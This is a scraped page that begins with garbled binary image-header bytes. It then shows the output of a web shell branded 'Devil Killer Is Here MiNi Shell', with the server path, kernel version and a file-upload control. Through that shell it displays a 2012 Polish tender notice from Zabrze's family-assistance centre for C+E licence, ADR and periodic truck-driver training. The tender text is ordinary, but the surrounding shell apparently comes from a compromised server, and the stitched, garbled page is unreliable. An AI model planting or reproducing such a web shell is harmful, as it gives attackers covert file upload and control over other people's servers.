JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121009/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121009/388308-N-2012.html

<p class="kh_header"><b>Zabrze: Organizacja i przeprowadzenie szkoleń dla uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze w zakresie :  prawo jazdy kat. C+E, ADR-przewóz drogowy towarów niebezpiecznych, szkolenie okresowe dla kierowców samochodów ciężarowych-3 części</b><br>
<b>Numer ogłoszenia: 388308 - 2012; data zamieszczenia: 09.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Roosevelta 40, 41-800 Zabrze, woj. śląskie, tel. 032 2777800, faks 032 2777802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.zabrze.pl.pl,www.zabrze.magistrat.pl/zakładka opieka społeczna/mopr/zamówienia publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń dla uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze w zakresie :  prawo jazdy kat. C+E, ADR-przewóz drogowy towarów niebezpiecznych, szkolenie okresowe dla kierowców samochodów ciężarowych-3 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkoleń dla uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze w zakresie :  prawo jazdy kat. C+E, ADR-przewóz drogowy towarów niebezpiecznych, szkolenie okresowe dla kierowców samochodów ciężarowych-3 części
Cześc 1 - Prawo jazdy kat. C+E, czesc 2 - ADR przewóz drogowy towarów iebezpiecznych, część 3 - szkolenie okresowe dla kierowców samochodów cieżarowych
Kazde ze szkoleń dla 1 uczestnika projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz oferty
parafowany wzór umowy
pełnomocnictwo
oświadczenie dotyczące posiadanego doświadczenia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy;
- zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy;
- zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych;
- wprowadzenie lub zmiana podwykonawcy - w uzasadnionych przypadkach, za pisemną zgodą Zamawiającego
- zmiana miejsca realizacji zajęć;
-zmiana terminu realizacji zamówienia;
- wprowadzenie informacji dodatkowych związanych z nowymi wytycznymi w realizacji Projektu;
- zmiana osób -kadry zapewnionej przez Wykonawcę;
- w przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę różnicy w kwocie podatku VAT, ;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.zabrze.pl,www.zabrze.magistrat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Zabrzu
ul. Roosevelta 40
41-800 Zabrze
Pokój nr 216 - 2 piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2012 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Rodzinie w Zabrzu
ul. Roosevelta 40
41-800 Zabrze
Pokój nr 117 - 1 piętro - KANCELARIA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs prawa jazdy kat. C+E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W szkoleniu/kursie weźmie udział 1 uczestnik/uczestniczka projektu systemowego.
1.Realizacja  Kursu prawa jazdy kat.C+E w części dydaktycznej odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku, natomiast część praktyczna ( poniedziałek - niedziela  wg. godzin indywidualnie uzgodnionych z kursantem).
2. Dzienny wymiar godzin dydaktycznych teoretycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin kursu na każdego uczestnika  - 45, w tym 20 godzin dydaktycznych teorii ( po 45 minut) i 25 godzin praktycznych  pełne godziny zegarowe).
B) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia - zajęcia dydaktyczne - pomieszczenie na terenie miasta Zabrze lub w odległości 30 km od Zabrza, zajęcia praktyczne tj. plac manewrowy  na terenie Zabrza lub w odległości 30 km od Zabrza oraz  jazdy po mieście w tym na trasach egzaminacyjnych.
	C) WARUNKI KURSOWE 
Szkolenie musi zostać przeprowadzone głównie zgodnie z ustawą z dnia 20 czerwca 1997 r.Prawo o ruchu drogowym- tekst jednolity Dz. U.2005, Nr 108, poz.908 z późn.zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów(Dz.U.2005.217.1834 z późn.zm.)i innymi aktami regulującymi przedmiot zamówienia.
Program szkolenia winien odpowiadać obowiązującemu stanowi prawnemu.
D)SALA/E SZKOLENIOWA/E/SPRZĘT 
1. Wykonawca zobowiązany jest do zapewnienia podczas zajęć wyposażenia dydaktycznego, odpowiadającego obowiązującemu stanowi prawnemu i poziomowi techniki oraz do udostępnienia uczestnikowi/uczestniczce wszelkich materiałów szkoleniowych niezbędnych do przeprowadzenia kursu. Pomieszczenia będą  dostosowane do prowadzenia zajęć i odpowiednio w tym celu wyposażone. Wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p.poż. Zapewnione pomieszczenie/sala wyposażona będzie w odpowiednią do liczby uczestników/uczestniczek  liczbę stolików i miejsc siedzących, właściwie oświetloną, ogrzewaną, przewietrzaną i odizolowaną od innych pomieszczeń.  
2. Organizator kursu zapewnia : sprzęt niezbędny do przeprowadzenia kursu w tym stanowisko komputerowe 
w ilości jedno stanowisko dla 1 uczestnika kursu, materiały szkoleniowe podręczniki i oryginalne oprogramowanie zapisane na  płytach CD-R z testami egzaminacyjnymi dla uczestnika/uczestniczki , w tym jeden dodatkowy do dokumentacji projektu), egzamin wewnętrzny. 
3. Wykonawca musi posiadać lub mieć możliwość dysponowania odpowiednią ilością pojazdów-zgodnych z obowiązującymi przepisami i instruktorów aby w terminie określonym jako termin realizacji umowy  przeszkolić skierowaną przez Zamawiającego osobę.
4. Wykonawca zapewni w kosztach kursu opłatę za badania lekarskie, które należy przeprowadzić na początku szkolenia-w przypadku negatywnego orzeczenia Zamawiający pokryje jedynie koszt badań.
5. Wykonawca zapewni w kosztach kursu opłatę za podejście do egzaminu państwowego w ilości - 1 podejścia.
E) CATERING
1. Organizator kursu zapewnienia w kosztach zajęć teoretycznych  usługę cateringu rozumianą jako przygotowanie i serwowanie posiłków, przez które Zamawiający rozumie jako podanie uczestnikowi  kursu w trakcie jednego -każdego dnia kursu teoretycznego dobrej jakości  kawy, herbaty, kruchych ciastek (min 50 g na osobę) oraz zimnych napojów (wody i mineralnej i soków) w ilości 0,5l na osobę, a także ciepłego dwudaniowego obiadu na który składać się będzie np. : zupa(ok. 300ml na osobę)oraz mięso(kotlet,kurczak,filet)ok.250 - 300g, ziemniaki, frytki lub ryż oraz sałatka. Zamawiający nie dopuszcza możliwości serwowania jako obiadu gotowych dań typu fast food oraz gotowych sproszkowanych zup. Posiłek ma być podany w miejscu kursu w hermetycznie zapakowanych pojemnikach oraz termosach do ciepłych posiłków wraz ze sztućcami jednorazowymi lub ma być serwowany w lokalu gastronomicznym w odległości umożliwiającej piesze dojście uczestnika w terminie ok. 5 minut tj. w odległości do 300m od miejsca realizacji kursu stacjonarnego.
Dostęp do kawy, herbaty i drobnych przekąsek na zajęciach teoretycznych będzie możliwy stale tj. w miejscu realizacji zajęć.
F) OPŁATY DODATKOWE
1.  W koszt kursu należy doliczyć opłatę za pierwszy egzamin teoretyczny oraz praktyczny oraz opłatę za jedno podejście do egzaminu państwowego.
2. W koszt kursu należy doliczyć opłatę za wydanie orzeczenia lekarskiego. Badanie zostanie przeprowadzone na początku kursu. W przypadku negatywnego orzeczenia lekarskiego Zamawiający pokryje jedynie koszt badania.
3. Wykonawca zapewni dojazd i powrót uczestnika /uczestniczki na kurs (bilety na komunikację miejską).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ADR - PRZEWÓZ DROGOWY TOWARÓW NIEBEZPIECZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A)	UCZESTNICY
W szkoleniu/kursie weźmie udział 1 uczestnik/uczestniczka projektu systemowego.
B)	FORMA i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  5 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na  uczestnika  - 25.
C) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia/kursu -pomieszczenie na terenie miasta Zabrze lub w odległości 30 km od Zabrza.
UWAGA : Wykonawca zapewni w kosztach materiały do zajęć.
D) WARUNKI KURSOWE 
Szkolenie musi zostać przeprowadzone głównie zgodnie z ustawą z dnia 20 czerwca 1997 r.Prawo o ruchu drogowym- tekst jednolity Dz. U.2005, Nr 108, poz.908 z późn.zm.) oraz Rozporządzeniem Ministra Transportu, Budownictwa i  Gospodarki Morskiej z dnia 29 maja 2012 r. Dz.U.2012, poz. 619 ), ustawą o przewozie towarów niebezpiecznych z dnia 19 sierpnia 2011 r. Dz.U nr 227, poz. 1367 i innymi aktami regulującymi przedmiot zamówienia.
Program szkolenia winien odpowiadać obowiązującemu stanowi prawnemu.
E) SALA/E SZKOLENIOWA/E/SPRZĘT 
1. Wykonawca zobowiązany jest do zapewnienia podczas zajęć wyposażenia dydaktycznego, odpowiadającego obowiązującemu stanowi prawnemu i poziomowi techniki oraz do udostępnienia uczestnikowi/uczestniczce wszelkich materiałów szkoleniowych niezbędnych do przeprowadzenia kursu. Pomieszczenia będą  dostosowane do prowadzenia zajęć i odpowiednio w tym celu wyposażone. Wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p.poż. Zapewnione pomieszczenie/sala wyposażona będzie w odpowiednią do liczby uczestników/uczestniczek  liczbę stolików i miejsc siedzących, właściwie oświetloną, ogrzewaną, przewietrzaną i odizolowaną od innych pomieszczeń.  
2. Organizator kursu zapewnia : sprzęt niezbędny do przeprowadzenia kursu, materiały szkoleniowe podręczniki dla uczestnika/uczestniczki , w tym jeden dodatkowy do dokumentacji projektu), egzamin wewnętrzny. 
4. Wykonawca zapewni w kosztach kursu opłatę za badania lekarskie - jeśli wymagane, które należy przeprowadzić na początku szkolenia-w przypadku negatywnego orzeczenia Zamawiający pokryje jedynie koszt badań.
5. Wykonawca zapewni w kosztach kursu opłatę za podejście do egzaminu państwowego w ilości - 1 podejścia.
E) CATERING
1. Organizator kursu zapewnienia w kosztach zajęć teoretycznych  usługę cateringu rozumianą jako przygotowanie i serwowanie posiłków, przez które Zamawiający rozumie jako podanie uczestnikom kursu w trakcie jednego -każdego dnia kursu teoretycznego dobrej jakości  kawy, herbaty, kruchych ciastek (min 50 g na osobę) oraz zimnych napojów (wody i mineralnej i soków) w ilości 0,5l na osobę, a także ciepłego dwudaniowego obiadu na który składać się będzie np. : zupa(ok. 300ml na osobę)oraz mięso(kotlet,kurczak,filet)ok.250 - 300g, ziemniaki, frytki lub ryż oraz sałatka. Zamawiający nie dopuszcza możliwości serwowania jako obiadu gotowych dań typu fast food oraz gotowych sproszkowanych zup. Posiłek ma być podany w miejscu kursu w hermetycznie zapakowanych pojemnikach oraz termosach do ciepłych posiłków wraz ze sztućcami jednorazowymi lub ma być serwowany w lokalu gastronomicznym w odległości umożliwiającej piesze dojście uczestnika w terminie ok. 5 minut tj. w odległości do 300m od miejsca realizacji kursu stacjonarnego.
Dostęp do kawy, herbaty i drobnych przekąsek na zajęciach teoretycznych będzie możliwy stale tj. w miejscu realizacji zajęć.
F) OPŁATY DODATKOWE
1.  W koszt kursu należy doliczyć opłatę za egzamin teoretyczny i praktyczny
2.  Wykonawca zapewni dojazd i powrót uczestnika /uczestniczki na kurs (bilety na komunikację miejską)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> SZKOLENIE OKRESOWE DLA KIEROWCÓW SAMOCHODÓW CIĘŻAROWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szkoleniu/kursie weźmie udział 1 uczestnik/uczestniczka projektu systemowego.
B) FORMA i CZAS TRWANIA
1. Realizacja może odbywać się będzie 6 dni w tygodniu od poniedziałku do soboty.
2. Dzienny wymiar godzin dydaktycznych nie powinien przekroczyć  8 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut) z uwzględnieniem przerwy kawowej 15 minut oraz przerwy na obiad 30 minut.
3. Ilość godzin na  uczestnika  - 35.
C) MIEJSCE REALIZACJI
Miejsce realizacji szkolenia/kursu -pomieszczenie na terenie miasta Zabrze lub w odległości 30 km od Zabrza.
UWAGA : Wykonawca zapewni w kosztach materiały do zajęć.
D) WARUNKI KURSOWE 
Szkolenie musi zostać przeprowadzone głównie zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02 kwietnia 2010 r. - Dz.U nr 53, poz. 314. i innymi aktami regulującymi przedmiot zamówienia.
Program szkolenia winien odpowiadać obowiązującemu stanowi prawnemu.
E)SALA/E SZKOLENIOWA/E/SPRZĘT 
1. Wykonawca zobowiązany jest do zapewnienia podczas zajęć wyposażenia dydaktycznego, odpowiadającego obowiązującemu stanowi prawnemu i poziomowi techniki oraz do udostępnienia uczestnikowi/uczestniczce wszelkich materiałów szkoleniowych niezbędnych do przeprowadzenia kursu. Pomieszczenia będą  dostosowane do prowadzenia zajęć i odpowiednio w tym celu wyposażone. Wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p.poż. Zapewnione pomieszczenie/sala wyposażona będzie w odpowiednią do liczby uczestników/uczestniczek  liczbę stolików i miejsc siedzących, właściwie oświetloną, ogrzewaną, przewietrzaną i odizolowaną od innych pomieszczeń.  
2. Organizator kursu zapewnia : sprzęt niezbędny do przeprowadzenia kursu, materiały szkoleniowe podręczniki dla uczestnika/uczestniczki , w tym jeden dodatkowy do dokumentacji projektu), egzamin. 
F) CATERING
1. Organizator kursu zapewnienia w kosztach zajęć teoretycznych  usługę cateringu rozumianą jako przygotowanie i serwowanie posiłków, przez które Zamawiający rozumie jako podanie uczestnikowi/czce kursu w trakcie jednego -każdego dnia kursu dobrej jakości  kawy, herbaty, kruchych ciastek (min 50 g na osobę) oraz zimnych napojów (wody i mineralnej i soków) w ilości 0,5l na osobę, a także ciepłego dwudaniowego obiadu na który składać się będzie np. : zupa(ok. 300ml na osobę)oraz mięso(kotlet,kurczak,filet)ok.250 - 300g, ziemniaki, frytki lub ryż oraz sałatka. Zamawiający nie dopuszcza możliwości serwowania jako obiadu gotowych dań typu fast food oraz gotowych sproszkowanych zup. Posiłek ma być podany w miejscu kursu w hermetycznie zapakowanych pojemnikach oraz termosach do ciepłych posiłków wraz ze sztućcami jednorazowymi lub ma być serwowany w lokalu gastronomicznym w odległości umożliwiającej piesze dojście uczestnika w terminie ok. 5 minut tj. w odległości do 300m od miejsca realizacji kursu stacjonarnego.
Dostęp do kawy, herbaty i drobnych przekąsek na zajęciach będzie możliwy stale tj. w miejscu realizacji zajęć.
G) OPŁATY DODATKOWE
1.  W koszt kursu należy doliczyć opłatę za egzamin .
2. W koszt kursu należy doliczyć opłatę za badania psychotechniczne.
3. Wykonawca zapewni dojazd i powrót uczestnika /uczestniczki na kurs (bilety na komunikację miejską)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0.</p></li>
